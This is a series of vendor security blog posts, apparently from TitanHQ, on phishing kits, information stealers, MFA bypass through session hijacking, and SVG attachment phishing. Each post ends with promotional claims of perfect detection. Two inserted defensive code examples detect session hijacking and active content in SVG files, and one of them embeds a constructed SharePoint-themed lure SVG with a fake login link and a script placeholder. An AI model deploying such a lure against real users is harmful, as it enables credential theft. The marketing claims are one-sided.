The latest round of tests was conducted over 16 days in February, with the SpamTitan and PhishTitan solutions blocking all threats and spam emails. The final results for Q1, 2025 are due to be announced at the end of March, with TitanHQ on track to earn its fourth consecutive VBSpam+ certification. “We’re excited to have significantly exceeded the industry benchmark in these interim results,” said Ronan Kavanagh, CEO at TitanHQ. “We’re now on track to receive a fourth consecutive VB+ award in Q1. These results highlight our relentless dedication to delivering top-tier email security, and we will continue safeguarding our clients against emerging cyber threats.”
The exceptional detection rates have prompted many managed services providers to migrate to TitanHQ from other solutions, keen to ensure their clients get the very best protection. Not only does TitanHQ deliver immediate and substantial threat mitigation, but all solutions have also been developed from the ground up to meet all the needs of MSPs, ensuring exceptional protection with minimal management overhead.
The SpamTitan spam filtering service includes a spam filter for incoming mail, an outbound spam filter, email sandboxing, dual antivirus engines, malicious link detection, and machine learning-based detection, ensuring exceptional protection from the full range of email threats. The next-generation email sandbox detects malware based on its behavior, allowing novel malware threats to be detected that signature-based detection misses while only causing minimal delays to message delivery. In the tests, TitanHQ was in the green for all speed tests.
If you want the very best in threat protection and exceptional value for money, why not make the switch to TitanHQ? Give the team a call today to find out more or take advantage of the free trial and see the difference TitanHQ solutions make.
by titanadmin | Feb 27, 2025 | Spam Software
Phishing is still the leading technique used by cybercriminals, and the availability of LLMs for crafting perfect phishing emails and the abuse of legitimate services for sending emails ensures that cybercriminals get a sufficiently high success rate.
Cybercriminals’ tactics are constantly evolving and they are increasingly able to defeat traditional security measures. One recent report suggests that 70% of phishing emails successfully pass DMARC authentication checks, with more than 50% of phishing emails passing through businesses’ email security defenses.
Not only is phishing the most popular technique, but attacks are also increasing. To a large extent, the increase in attacks has been driven by the availability of phishing kits. Phishing kits provide cybercriminals with everything they need to perform successful phishing campaigns aside from the email addresses to target, and they can easily be purchased on cybercrime forums. The phishing kits open up phishing to a broad range of individuals, allowing them to conduct campaigns with ease, monitor performance, and automate campaigns and credential theft.
Phishing kits are offered on cybercrime forums and Telegram, with the Darcula phishing-as-a-service platform being one of the most comprehensive tools. When the phishing kit was released last year, it used around 20,000 domains that spoofed well-known brands and has since been used to conduct phishing campaigns in more than 100 countries. Now a new version of the platform is about to be released with even more features to make conducting phishing campaigns even easier.
What is particularly concerning about this platform is its ability to create DIY phishing kits to target any brand. Any user of the kit can simply provide the URL for the brand they want to target and the kit will generate all required templates for the attack, including cloning the legitimate site for the phishing landing page. The kit also includes pre-made templates for capturing passwords, credit card numbers, and for MFA entry prompts.
The latest version also includes a user-friendly dashboard, IP and bot filtering, performance measurement metrics to determine the effectiveness of phishing campaigns, automated credit card theft and digital wallet loading, and the removal of technical skills requirements, making it as easy as possible to conduct extensive phishing campaigns.
With AI tools helping to make phishing campaigns more effective and new phishing kits being developed to remove the need for any technical skills, phishing attacks are likely to continue to increase and businesses need to ensure that they have appropriate defenses in place.
The good news is TitanHQ can help. TitanHQ offers two solutions for protecting corporate email accounts from phishing and malware, the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365. The engine that powers both of these solutions is regularly tested for effectiveness by Virus Bulletin. In Q3, 2024, TitanHQ ranked joint first for protection, in sole 1st place in Q4, 2024, and in the latest tests in February, achieved perfect scores for phishing detection, malware detection, and spam detection, scoring 100% in all three areas with a 0.00% false positive rate.
The exceptional scores for phishing detection and malware blocking have prompted many MSPs to make the switch to TitanHQ to ensure they can give their clients the very best in protection, and increasing numbers of SMBs are choosing TitanHQ as their antispam software and anti-phishing partner.
In addition to these technical solutions, TitanHQ offers a comprehensive security awareness training and phishing simulation platform to help businesses improve their human defenses by eradicating poor security practices and teaching employees how to identify phishing emails.
While it is bad news that phishing attacks continue to increase, with TitanHQ as your security partner, your business will be well protected. Give the TitanHQ team a call today to find out more or take advantage of a free trial of TitanHQ solutions and put them to the test.
by titanadmin | Feb 27, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
Cybercriminals have extensively used ransomware in their attacks on businesses, government entities, and critical infrastructure, and while these attacks often make headline news and cause massive disruption, there is a much more common malware threat – information stealers.
Information stealers are malware that is silently installed on devices and can remain undetected for long periods of time. These types of malware have many different capabilities and can serve as downloaders for other malicious payloads, but their main function is information theft. Information theft is achieved in several ways, depending on the malware variant in question. These malware types often have keylogging capabilities and can record keystrokes as they are entered on the keyboard, allowing sensitive information such as usernames and passwords to be captured. They can often record audio from the microphone, take control of the webcam and record video, and take screenshots. They can also steal browser histories, cookies, and other sensitive information.
The information stolen from the victim allows the threat actor to conduct follow-on attacks, access accounts and steal further sensitive data, access and drain financial accounts, or commit identity theft and other types of fraud. Information stealers can also provide a threat actor with access to a device, and that access is often sold to specialized cybercriminal groups such as ransomware actors. Many hackers now act as initial access brokers, using information stealers to gain access before selling that access to other cybercriminal groups.
Information stealers such as Lumma, AgentTesla, FormBook, Redline, and StealC have been increasingly used in recent years, especially last year. Check Point observed a 58% increase in attacks from the previous year, and a report from the threat intelligence firm KELA suggested that lists of credentials obtained from information stealers are being shared on cybercrime forums. The credential lists included billions of logins that had been captured from infected devices; according to KELA, around 4.3 million devices were involved, from which around 330 million credentials had been stolen. An estimated 40% were corporate credentials.
The breach notification service, Have I Been Pwned (HIBP), has recently added 284 million compromised accounts to the service. The credentials were identified from chats on a Telegram channel called ALIEN TXTBASE, with the data obtained from information stealer logs. HIBP founder Troy Hunt said the stealer logs included 23 billion rows of data with 493 million unique website and email address pairs and around 284 million unique email addresses. Hunt said 244 million passwords were not previously known to the HIBP service, with 199 million already in its database.
The extent to which these malware variants are used, and the increase in use in 2024, clearly demonstrates the importance of advanced malware protection and the sheer number of compromised credentials suggests many businesses have been infected with information stealers. The problem for businesses is that these malware variants can be difficult to identify, as new versions are constantly being released. Traditional antivirus software is signature-based, which means it can only detect known malware. When new malware is identified, a signature of that malware is obtained and fed into antivirus software. If a malware signature is not in the software’s definition list, it will not be detected. There are several ways that these information stealers are distributed, with email being one of the most common. They can also be downloaded from the internet from malicious websites in drive-by downloads or installed along with pirated software or doctored versions of legitimate software installers.
Defending against information stealers requires a combination of measures – a defense-in-depth approach, with multiple overlapping layers of security. Given the high volume of infections stemming from email, businesses need a spam filter to block malicious emails. Antispam software will block many malicious emails; however, an antispam server must have advanced antimalware defenses. That means traditional signature-based detection and advanced behavioral detection to ensure previously unseen malware is identified and blocked.
SpamTitan uses dual anti-virus engines for detecting known threats and a next-generation email sandbox for behavioral analysis. If standard checks are passed, suspicious messages are sent to the sandbox – a safe environment where they are detonated and their behavior is analyzed. This vastly improves the detection rate, and in recent independent tests, SpamTitan outperformed all other tested email security solutions and had a 100% malware detection rate.
Security awareness training needs to be provided to the workforce to ensure that employees have the skills to recognize and avoid threats, no matter where they are encountered. Through training, employees should be conditioned to always report potential threats to their security team, and businesses can promote security best practices and eradicate risky behaviors. TitanHQ offers businesses a comprehensive training and phishing simulation platform – SafeTitan – that has been shown to be highly effective at improving employees’ security awareness.
Many malware infections occur via the Internet, and while training can reduce risk, a technical security solution is required to block threats. WebTitan is a DNS-based web filter that is used to block access to known malicious websites, assess websites in real-time for malicious content, block certain file downloads from the Internet, and restrict the sites and web pages employees can access.
With these three security solutions in your arsenal, you will be able to significantly improve your security posture and block information stealers and other threats. Give the TitanHQ team a call today to find out more or take advantage of a free trial of these solutions.
by titanadmin | Feb 26, 2025 | Phishing & Email Spam, Security Awareness, Website Filtering
A ransomware group called EncryptHub has been accelerating attacks and is now known to have breached the networks of more than 600 organizations worldwide. EncryptHub has been active since June 2024 and gains initial access to victims’ networks via spear phishing attacks, with initial contact made via SMS messages rather than email.
The group impersonates commonly used corporate VPN products such as Palo Alto GlobalProtect and Cisco AnyConnect as well as Microsoft 365, and drives traffic to its malicious domains by making contact via personalized SMS messages (smishing) or the phone (vishing).
If vishing is used and the victim is contacted by phone, EncryptHub impersonates a member of the IT helpdesk and uses social engineering techniques to trick them into disclosing their VPN credentials. The phone number is spoofed to make it appear that the call is coming from inside the company, or Microsoft Teams phone numbers are used. The victim is told that there is a problem with the corporate VPN that needs to be resolved, and if the scam works, the user is sent a link via SMS that directs them to a domain that resembles the VPN solution used by that company. If the user enters their credentials, they are used in real time to log in, and if there are any multifactor authentication prompts, the threat actor is able to obtain them on the call. Once the threat actor has gained access, the user is redirected to the genuine login page for their VPN, and the call is terminated.
Another tactic used by the group involves SMS messages with a fake Microsoft Teams link, with the goal of capturing the user’s Microsoft 365 credentials. The user is directed to a Microsoft Teams-related login page and the threat actor exploits Open URL parameters on microsoftonline.com to harvest email addresses and passwords, while the user believes they are interacting with the legitimate Microsoft service. Once access is gained, the group uses PowerShell scripts and malware to gain persistence, then moves laterally, steals data, deploys the ransomware payload, and issues a ransom demand.
The group’s tactics are highly effective, as in contrast to spear phishing via email, it is difficult to block the initial contact via SMS or over the phone. The key to preventing these attacks is improving the security awareness of the workforce and using a web filter to prevent the phishing domains from being accessed by employees. TitanHQ’s web filter, WebTitan, is a DNS-based web filtering solution that is constantly updated with the latest threat intelligence from multiple sources to provide up-to-the-minute protection against new phishing domains. Any attempt to visit a known phishing domain or other malicious site will be blocked, with the user directed to a locally hosted block page.
Regular security awareness training for the workforce is vital to teach security best practices and raise awareness of the tactics used by cybercriminals to breach corporate networks. With the SafeTitan security awareness training platform, businesses can easily create training programs tailored for individuals, roles, and departments, and automate those campaigns so they run continuously throughout the year, delivering training in small chunks on a weekly or monthly basis. It is easy to incorporate new training in response to changing threat actor tactics to increase awareness of specific threats. The platform also includes a phishing simulator for running phishing simulations on the workforce to reinforce training and identify knowledge gaps. If a phishing simulation is failed, training is automatically delivered to the user in real time, relevant to the threat they failed to identify. This ensures training is delivered at the point when it is likely to be most effective.
For more information on TitanHQ solutions, including the WebTitan DNS filter and the SafeTitan security awareness training platform, give the TitanHQ team a call today. Both solutions are available on a free trial to allow you to assess them fully before making a purchase decision.
by titanadmin | Feb 20, 2025 | Phishing & Email Spam
Information stealers are one of the most common ways that initial access is gained to business networks, and the extent to which these malware variants are used is alarming. According to Hudson Rock, an estimated 30 million computers have been compromised using information stealers in the past few years and Check Point reports that infections have increased by 58% in the past year.
Cybercriminals specialized in infecting devices distribute their information stealers, which collect sensitive data such as session cookies and login credentials, allowing access to be gained to corporate networks. Oftentimes, the cybercriminals then sell that access to other cybercriminal groups, acting as initial access brokers. The groups that they work with have their own specialisms, such as conducting ransomware attacks. These malware variants are capable of stealing large amounts of sensitive information from compromised devices. They can exfiltrate files, obtain web browser data and passwords, and steal cryptocurrency extensions. Infection with an information stealer can result in the large-scale theft of data, compromised accounts, and further attacks, including ransomware infections.
Security researchers have recently uncovered a new campaign that distributes information stealers such as Lumma and ACR Stealer via cracked versions of legitimate software. The pirated software can be obtained and used free of charge, albeit illegally, and is available through warez sites and from peer-to-peer file-sharing networks. The installers have been packaged to silently deliver an information stealer. Cybercriminals often use SEO poisoning to get their malicious sites to appear high in search engine listings or add malicious adverts to legitimate ad networks (malvertising) to get them to appear on high-traffic websites. The adverts direct internet users to download sites. Initial contact is also made via email, with workers tricked into opening malicious files that launch scripts that deliver the information stealer payload or direct users to websites where the malware is downloaded under the guise of a legitimate program. Contact may also be made via the telephone, with the criminals impersonating IT helpdesk staff and tricking employees into downloading the malware.
Defending against information stealers means improving defenses against all these tactics, and that means there is no single cybersecurity solution or measure that will be effective against them all, but there are three important cybersecurity measures that you should strongly consider: anti-spam software, a DNS filter, and security awareness training.
Anti-spam Software
Many malware infections occur via email, either through attachments containing malicious scripts or via hyperlinks to websites from which malware is downloaded. When malicious attachments are used, they are not always detected by antispam software and can easily reach end users. To improve detection, email sandboxing is required, where messages are sent to the sandbox for deep inspection. In the sandbox, hyperlinks are also followed to identify any downloads that are triggered. If malicious actions are confirmed, the messages are quarantined and are not deleted.
A DNS Filter
Since many malware infections occur via the Internet, businesses should consider web filtering software. DNS-based web filters allow businesses to control the web content that users can access, block certain file downloads from the internet, and assess web content in real-time for malicious content, without the latency associated with other types of web filters. A DNS filter can prevent users from accessing malicious content and will reduce reliance on employees recognizing and avoiding threats.
Security Awareness Training
Anti-spam software and DNS filters will greatly improve security; however, employee security awareness also needs to be improved. Through regular security awareness training, businesses can eliminate risky practices and train employees how to recognize and avoid threats. By providing training continuously in small chunks throughout the year, businesses can develop a security culture and significantly improve their human defenses.
TitanHQ offers multi-award-winning cybersecurity solutions for SMBs and managed service providers (MSPs) that are easy to implement and offer exceptional protection, including the SpamTitan cloud-based spam filtering service, the WebTitan DNS filter, and the SafeTitan security awareness training and phishing simulation solution. All three solutions are available on a free trial to allow you to see for yourself the difference they make before making a purchase decision. Give the TitanHQ team a call to find out more and to discuss these options, and take the important first step toward improving your defenses.
by titanadmin | Feb 18, 2025 | Phishing & Email Spam
A growing number of businesses are implementing multi-factor authentication to add an extra layer of security and improve defenses against phishing attacks. While multifactor authentication (MFA) can prevent unauthorized individuals from accessing accounts using compromised credentials, MFA does not provide total protection. Several phishing kits are sold on hacking forums and Telegram that are capable of bypassing MFA, and a new phishing kit has recently been identified that can intercept credentials in real-time and bypass MFA through session hijacking. The phishing kit is being used to steal credentials and access Gmail, Yahoo, AOL, and Microsoft 365 accounts.
The Astaroth phishing kit has been offered on cybercrime forums since at least January 2025. Similar to the Evilginx phishing kit, Astaroth uses a reverse proxy to intercept and manipulate traffic between the victim and the legitimate authentication service of the account being targeted. A cybercriminal can use the Astaroth phishing kit in an adversary-in-the-middle attack, capturing not only login credentials but also 2FA tokens and session cookies, thereby bypassing MFA. The credential theft and session hijacking take place in real time, allowing the cybercriminal to instantly access the user’s account.
The user is presented with a phishing link, which is commonly communicated via email. If that link is clicked, the user is directed to a server and is presented with what appears to be a legitimate login page. The page has a valid SSL certificate, so no security warnings are generated. The server acts as a reverse proxy, and when the username and password are entered, they are captured and forwarded to the legitimate authentication service in real time.
The cybercriminal is alerted about the credential capture via the admin panel of the phishing kit or via Telegram, and the one-time passcodes, usually generated via SMS, push notifications, or authentication apps, are intercepted as they are entered by the user. When session cookies are generated, they are immediately hijacked and injected into the attacker’s browser, which means the attacker can impersonate the genuine user without needing their username, password, or 2FA token, since the session has already been authenticated. The kit also includes bulletproof hosting and reCAPTCHA bypasses, and allows the attacker to access the account immediately, before the user suspects anything untoward has happened.
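The attack above leaves two traces on the defender's side: the legitimate service sees the sign-in arrive from the proxy server rather than the victim's network, and the issued session cookie is then used from the attacker's browser (a second IP address and user agent). The following is an added detection sketch, not code from the original post or from any product; the log line format, field names, user names and network ranges are constructed for the example.

```python
"""Added example: flag session-hijack indicators of the reverse-proxy kind
in constructed identity-provider log lines.

Signals checked per session:
  1. the sign-in that issued the session came from outside the trusted networks
     (the credentials were relayed by the proxy, not sent by the user's browser);
  2. the session was used shortly afterwards from a different IP or user agent
     (the cookie was injected into another browser).
Signal 1 alone is noisy for mobile users; signal 2 is the stronger indicator.
Log format, field names and network ranges are assumptions for this example.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
import ipaddress


@dataclass
class Event:
    ts: datetime
    user: str
    session_id: str
    kind: str          # "signin" when the session is issued, "request" when it is used
    ip: str
    user_agent: str


def parse_line(line: str) -> Event:
    """Constructed line format: ISO-timestamp|user|session_id|kind|ip|user_agent."""
    ts, user, sid, kind, ip, ua = line.strip().split("|", 5)
    return Event(datetime.fromisoformat(ts), user, sid, kind, ip, ua)


def hijack_indicators(events, trusted_nets, window=timedelta(minutes=30)):
    """Return (user, session_id, reason) tuples; at most two per session."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]

    def trusted(ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in n for n in nets)

    findings = []
    signins = {e.session_id: e for e in events if e.kind == "signin"}
    by_time = sorted(events, key=lambda e: e.ts)
    for sid, s in sorted(signins.items()):
        if not trusted(s.ip):
            findings.append((s.user, sid, f"sign-in from untrusted network {s.ip}"))
        for e in by_time:
            if e.session_id != sid or e.kind != "request":
                continue
            age = e.ts - s.ts
            if timedelta(0) <= age <= window and (e.ip != s.ip or e.user_agent != s.user_agent):
                mins = int(age.total_seconds() // 60)
                findings.append((s.user, sid,
                                 f"session reused from {e.ip} / {e.user_agent} "
                                 f"{mins} min after issue to {s.ip} / {s.user_agent}"))
                break  # one reuse finding per session is enough to raise an alert
    return findings


# Constructed sample: alice's session is issued to one client and used by another;
# bob's session stays on the same trusted client.
SAMPLE_LOG = """\
2025-02-18T09:00:00|alice|s-1001|signin|203.0.113.10|Firefox/128
2025-02-18T09:03:00|alice|s-1001|request|198.51.100.7|Chrome/122
2025-02-18T09:05:00|bob|s-1002|signin|10.20.30.40|Chrome/122
2025-02-18T09:10:00|bob|s-1002|request|10.20.30.40|Chrome/122
"""
TRUSTED_NETS = ["10.0.0.0/8"]  # assumed corporate range for the example


def run_sample():
    events = [parse_line(l) for l in SAMPLE_LOG.splitlines() if l.strip()]
    return hijack_indicators(events, TRUSTED_NETS)


if __name__ == "__main__":
    for user, sid, reason in run_sample():
        print(f"ALERT {user} {sid}: {reason}")
```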
Phishing kits such as Astaroth are able to render multifactor authentication useless, demonstrating why it is so important to have effective anti-spam software, capable of identifying and blocking the initial phishing emails. SpamTitan is frequently rated as the best spam filter for business due to its ease of implementation and use, exceptional detection, and low false positive rate. TitanHQ also offers MSP spam filtering, with the solution developed from the ground up to meet all MSP needs. In recent independent tests by VirusBulletin, SpamTitan outperformed all other tested email security solutions, achieving the highest overall score thanks to a 100% malware catch rate, 100% phishing catch rate, 99.999% spam catch rate, and a 0.000% false positive rate. The exceptional performance is due to extensive threat intelligence feeds, machine learning to identify phishing attempts, and email sandboxing to detect and block malware and zero-day threats.
In addition to an advanced spam filtering service, businesses should ensure they provide regular security awareness training to the workforce and reinforce training with phishing simulations. SafeTitan from TitanHQ is an easy-to-use security awareness training platform that makes it easy to create effective training courses and automate the delivery of training content. The platform also includes a phishing simulator with an extensive library of phishing templates that makes it easy to create and automate phishing simulations, generating relevant training automatically if a user is tricked. That means training is delivered at the point when it is likely to be most effective at correcting behavior.
Give the TitanHQ team a call today for more information about these solutions. TitanHQ’s SpamTitan and SafeTitan products, like all TitanHQ solutions, are also available on a free trial.
by titanadmin | Feb 16, 2025 | Security Awareness, Spam Software
A phishing campaign has been identified that targets corporate Facebook credentials and has so far involved more than 12,000 messages to users worldwide. The campaign has primarily targeted enterprises in the European Union (45.5%), United States (45%), and Australia (9.5%) with the phishing emails sent using a legitimate Salesforce automated mailing service. When emails are sent via this service, a sender email address can be specified; however, if no address is supplied, the emails appear to have been sent directly from Salesforce from the noreply@salesforce.com email address, per the terms of service. As such, any recipient of the email may mistakenly believe that the emails are official.
The emails include fake versions of the Facebook logo, which recipients should be able to identify as fake; however, the emails are well-written, and the subject matter is sufficiently concerning to warrant a click. The emails warn the recipient about a copyright infringement claim that has been filed under the Digital Millennium Copyright Act (DMCA) against the user’s personal account, indicating material has been shared via their account that is in violation of copyright laws.
The messages include the date of the complaint, state that it was reported by Universal Music Group, and say that it is due to the unauthorized use of copyrighted music. The recipient is told they must respond to the claim by the close of business if they wish to contest the claim. The date of the required response is only 24 hours after the complaint date, therefore an immediate response is required. As is common with phishing attempts, there is a threat – permanent restrictions on the user’s Facebook account. The message includes a button to click to contest the claim, but rather than direct the user to a login page, they are directed to a fake support page, where they are provided with further information on the restrictions that have been or will be applied. Several variations of that email have been identified, including warnings that Facebook surveillance systems have identified a copyright issue and, as a result, limitations have been placed on the user’s account.
Those restrictions include the disabling of personal ad accounts and audiences, blocking the management of advertising assets or people for businesses, and preventing the user from creating or running ads and managing ad accounts. In order to have those restrictions removed, the user must click the button to request a review, which directs the user to a spoofed Facebook login page. If credentials are entered, they will be captured and used to log in to the user’s account. The campaign, identified by Check Point Research, targets business users, many of whom will rely on Facebook for advertising and customer contact, therefore the consequences of an account restriction could be serious, and certainly serious enough to warrant filing an appeal. What is unclear is how the threat actor uses the compromised accounts. Potentially they could be used for further scams, which could cause considerable reputational damage to the business.
Protecting against these types of phishing campaigns requires a combination of email security and user awareness. An email security solution can prevent these messages from reaching inboxes, thus neutralizing the threat, but security awareness training should also be provided to workforce members to help them identify and avoid phishing attempts. In this case, Facebook admins for the business should be warned about the campaign and instructed to log in to Facebook directly via their web browser if they receive any copyright infringement notices purporting to have been sent by Facebook. If there is a genuine problem with their account, it will be apparent when they log in.
With the SafeTitan security awareness training platform from TitanHQ, it is easy to create and automate security awareness training programs and roll out new training content in relation to specific threats, only providing that training to the individuals who are likely to be targeted. Phishing simulations can easily be created to test awareness of these phishing scams, with relevant training automatically delivered in response to clicks on phishing emails.
TitanHQ’s anti-spam software, SpamTitan, provides excellent protection against phishing, as demonstrated by recent tests by VirusBulletin. The cloud-based anti-spam service outperformed all other antispam solutions in the latest round of tests, blocking 100% of phishing emails and 100% of malware, earning SpamTitan the top spot for overall score. If you are not happy with your anti-phishing defenses or feel you are paying too much for protection, give the TitanHQ team a call and ask about SpamTitan. If you have yet to provide regular security awareness training to your workforce, why not sign up for a free trial of SafeTitan and put the product to the test on your workforce?
by titanadmin | Feb 14, 2025 | Phishing & Email Spam
Security awareness training programs teach employees to be constantly alert to potential phishing emails, especially emails with file attachments. Most employees will be aware that Office documents can contain macros, which, if allowed to run, can download malware onto their device, but they are likely much less suspicious about image files. Image files are far less likely to be malicious; however, there is an image file format that can contain malicious content – SVG files – and they are increasingly being used in phishing campaigns.
An SVG (Scalable Vector Graphics) file is an XML-based vector format, which is why it can be scaled without loss of quality. These files are commonly used for icons and buttons and are extensively used in graphic design, including for company logos. Image files may seem innocuous, but one property of SVG files, unlike raster formats such as JPEG, is that they can include scripts, anchor tags, and other types of active web content. Unless a computer has been configured to open SVG files with a specific image program, an SVG file attachment will be opened in a web browser, which renders that active content just as it would for a web page.
One campaign incorporated the SharePoint logo and advised the user that a secure document had been shared through Microsoft SharePoint. The image included a folder icon with the file name “Updated Compensation and Benefits” and an “Open” button that the user is encouraged to click. Clicking that button directs the user to a phishing page where they must enter their credentials to view the file. Those credentials are captured and used to access the user’s account. Many phishing campaigns that use SVG file attachments include hyperlinks that direct the user to a site spoofing a well-known brand such as Microsoft to harvest credentials, for example by displaying a fake Microsoft 365 login page. These phishing pages are designed to be indistinguishable from the genuine login prompt and may even autofill the user’s login name.
There are two main advantages to using SVG files in phishing campaigns. First and foremost, the file is less likely to be flagged as malicious by an email security solution, many of which do not analyze the content of SVG files, which ensures messages containing SVG files are delivered to an end user’s inbox. Secondly, since awareness of malicious SVG files is low, the targeted individuals may be easily tricked into clicking on the hyperlink. The use of SVG files in phishing campaigns is becoming more common, and this trend is likely to continue in 2025. Businesses should ensure that they have adequate defenses to block these attacks: advanced anti-spam software to block the phishing emails, and security awareness training content that has been updated to raise awareness of this attack technique.
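The point above is that an email filter which treats an SVG as an inert picture never sees the `<script>` or `<a>` elements inside it. The following scanner is an added example written for this article, not TitanHQ code and not part of any product described here; it uses only the Python standard library, and the SharePoint-themed message it inspects is constructed inline for the demonstration. It pulls attachments out of a raw message, identifies SVGs by content type, filename or content sniffing, and parses each one as XML to report the active-content markers the article names: script elements, anchors, event-handler attributes and `href` values that point off-image.

```python
"""Scan e-mail attachments for SVG files that carry active web content.

Added example (not TitanHQ code). Standard library only; the sample
message built in build_sample_message() is constructed for the demo.
"""
import email
import re
import xml.etree.ElementTree as ET
from email import policy
from email.message import EmailMessage

# Elements that turn an SVG from a picture into a web page.
ACTIVE_TAGS = {"script", "a", "foreignObject", "iframe", "embed", "object"}


def _local(name: str) -> str:
    """Strip the XML namespace prefix from an element or attribute name."""
    return name.rsplit("}", 1)[-1]


def looks_like_svg(part) -> bool:
    """Identify SVG parts by MIME type, extension, or sniffing the payload."""
    ctype = part.get_content_type()
    filename = (part.get_filename() or "").lower()
    if ctype == "image/svg+xml" or filename.endswith(".svg"):
        return True
    payload = part.get_payload(decode=True) or b""
    # Content sniffing catches SVGs delivered under a misleading MIME type.
    return b"<svg" in payload[:2048].lower()


def scan_svg(data: bytes) -> list[str]:
    """Return findings describing active content in one SVG document."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable SVG ({exc})"]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and re.match(r"\s*(javascript|data):", value, re.I):
                findings.append(f"script/data href on <{tag}>")
            elif name == "href" and re.match(r"\s*https?://", value, re.I):
                findings.append(f"external link {value} on <{tag}>")
    return findings


def scan_message(raw: bytes) -> dict[str, list[str]]:
    """Map each SVG attachment's filename to its list of findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = {}
    for part in msg.iter_attachments():
        if looks_like_svg(part):
            name = part.get_filename() or "<unnamed>"
            report[name] = scan_svg(part.get_payload(decode=True) or b"")
    return report


# A plain logo with no active content; expected to produce no findings.
CLEAN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 64 64">'
             b'<circle cx="32" cy="32" r="30" fill="#336699"/>'
             b'<text x="18" y="40" fill="#fff">TH</text></svg>')

# Constructed lure modelled on the SharePoint-themed campaign described above.
LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="600" height="300">
  <text x="20" y="40">A secure document has been shared with you</text>
  <text x="20" y="80">Updated Compensation and Benefits</text>
  <a xlink:href="https://login.example.invalid/m365"><rect x="20" y="120" width="120" height="40"/><text x="40" y="145">Open</text></a>
  <script>/* redirect logic would live here */</script>
</svg>"""


def build_sample_message() -> bytes:
    """Build a constructed phishing message with an SVG and a PNG attachment."""
    msg = EmailMessage()
    msg["From"] = "sharepoint-noreply@example.invalid"
    msg["To"] = "employee@example.invalid"
    msg["Subject"] = "Document shared with you"
    msg.set_content("A secure document has been shared through Microsoft SharePoint.")
    msg.add_attachment(LURE_SVG, maintype="image", subtype="svg+xml",
                       filename="SharePoint_Document.svg")
    msg.add_attachment(b"\x89PNG\r\n\x1a\n", maintype="image", subtype="png",
                       filename="logo.png")   # non-SVG part, should be skipped
    return msg.as_bytes()


if __name__ == "__main__":
    for name, findings in scan_message(build_sample_message()).items():
        print(name, "->", findings or ["no active content"])
```

A filter would quarantine any attachment whose findings list is non-empty; the `<a>` and `<script>` findings together are exactly the "click Open, land on a credential page" pattern described in the campaign, while the clean logo passes untouched.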
SpamTitan is an advanced spam filtering service from TitanHQ that has been proven to block more phishing emails than other email security solutions. SpamTitan was recently put to the test by VirusBulletin and outperformed all other tested anti-spam software solutions, blocking 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. Machine learning algorithms ensure that the solution gets better over time, extensive threat intelligence feeds keep the solution automatically updated with up-to-the-minute threat intelligence, and a next-generation email sandbox provides exceptional protection against malware. When coupled with the SafeTitan security awareness training and phishing simulations to improve employee awareness, businesses will be well protected against phishing, malware, and other email-based attacks. Give the TitanHQ team a call today for more information about these solutions or take advantage of a free trial and see for yourself the difference these solutions make to your security posture.
by titanadmin | Feb 3, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
Investigations of cyberattacks have identified an increasing number of incidents that started with email bombing. A high percentage of cyberattacks involve phishing, where emails are sent to employees to trick them into visiting a malicious website and disclosing their credentials, or opening a malicious file that installs malware. Email bombing is now being used to increase the effectiveness of phishing campaigns.
With email bombing, the user is sent a large number of spam emails in a short period of time, for example by adding the user to a large number of mailshots, news services, and spam lists. The threat actor creates a genuine spam problem, then impersonates a member of the IT department and claims they can fix it, with contact often made via a Microsoft Teams message. If the user accepts, they are tricked into installing remote access software and granting the threat actor remote access to their device. The threat actor then establishes persistent access to the user’s device during the remote access session. What starts with an email bombing attack often ends with a ransomware attack.
There are several measures that you should consider implementing to prevent these attacks. If you use Microsoft Teams, consider restricting calls and messages from external organizations, unless there is a legitimate need to accept such requests. If so, ensure permission is only given to trusted individuals such as business partners. The use of remote access tools should be restricted to authorized personnel only, and steps should be taken to prevent the installation of these tools, including using a web filter to block downloads of these tools (and other executables) from the Internet.
A spam filter should be implemented to block spam and unwanted messages. Advanced spam filters such as SpamTitan use AI-guided detection and machine learning to block spam, phishing, and other malicious emails, along with email sandboxing to identify novel threats and zero-day malware. In the Q4 2024 tests at VirusBulletin, the SpamTitan spam filtering service blocked 99.999% of spam emails, 100% of phishing emails, and 100% of malware with a 0.000% false positive rate, earning SpamTitan top position out of all anti-spam software under test.
Businesses should not underestimate the importance of security awareness training and phishing simulations. Regular security awareness training should be provided to all members of the workforce to raise awareness of the tactics used by cybercriminals. A cyberattack is much more likely to occur as a result of a phishing or social engineering attempt than the exploitation of a software vulnerability. Businesses that use the SafeTitan security awareness training platform and phishing simulator have reduced susceptibility to email attacks by up to 80%. For more information on TitanHQ cybersecurity solutions, including award-winning anti-spam solutions for managed service providers, give the TitanHQ team a call or take advantage of a free trial of any of TitanHQ’s cybersecurity solutions.
by titanadmin | Jan 31, 2025 | Phishing & Email Spam, Security Awareness, Spam News
As the massive cyberattack on Change Healthcare demonstrated last year, the failure to implement multifactor authentication on accounts can be costly. In that attack, multifactor authentication was not implemented on a Citrix server, and stolen credentials allowed access that resulted in the theft of the personal and health information of 190 million individuals. The ransomware attack caused a prolonged outage and remediation and recovery cost Change Healthcare an estimated $2.9 billion last year.
